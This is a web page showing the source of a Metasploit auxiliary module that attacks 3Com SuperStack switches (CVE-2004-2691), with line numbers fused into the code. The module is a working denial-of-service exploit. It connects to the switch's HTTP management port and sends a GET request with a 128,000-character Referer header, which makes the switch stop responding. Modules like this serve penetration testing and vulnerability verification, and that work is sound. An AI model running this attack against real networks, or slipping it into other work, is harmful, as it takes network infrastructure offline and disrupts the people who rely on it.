Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/dos/http/3com_superstack_switch.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(update_info(info,11'Name' => '3Com SuperStack Switch Denial of Service',12'Description' => %q{13This module causes a temporary denial of service condition14against 3Com SuperStack switches. By sending excessive data15to the HTTP Management interface, the switch stops responding16temporarily. The device does not reset. Tested successfully17against a 3300SM firmware v2.66. Reported to affect versions18prior to v2.72.19},20'Author' => [ 'aushack' ],21'License' => MSF_LICENSE,22'References' =>23[24# aushack - I am not sure if these are correct, but the closest match!25[ 'OSVDB', '7246' ],26[ 'CVE', '2004-2691' ],27[ 'URL', 'http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf' ],28],29'DisclosureDate' => '2004-06-24'))3031register_options( [ Opt::RPORT(80) ])32end3334def run35begin36connect37print_status("Sending DoS packet to #{rhost}:#{rport}")3839sploit = "GET / HTTP/1.0\r\n"40sploit << "Referer: " + Rex::Text.rand_text_alpha(1) * 1280004142sock.put(sploit +"\r\n\r\n")43disconnect44print_error("DoS packet unsuccessful")45rescue ::Rex::ConnectionRefused46print_error("Unable to connect to #{rhost}:#{rport}")47rescue ::Errno::ECONNRESET48print_good("DoS packet successful. #{rhost} not responding.")49end5051end52end535455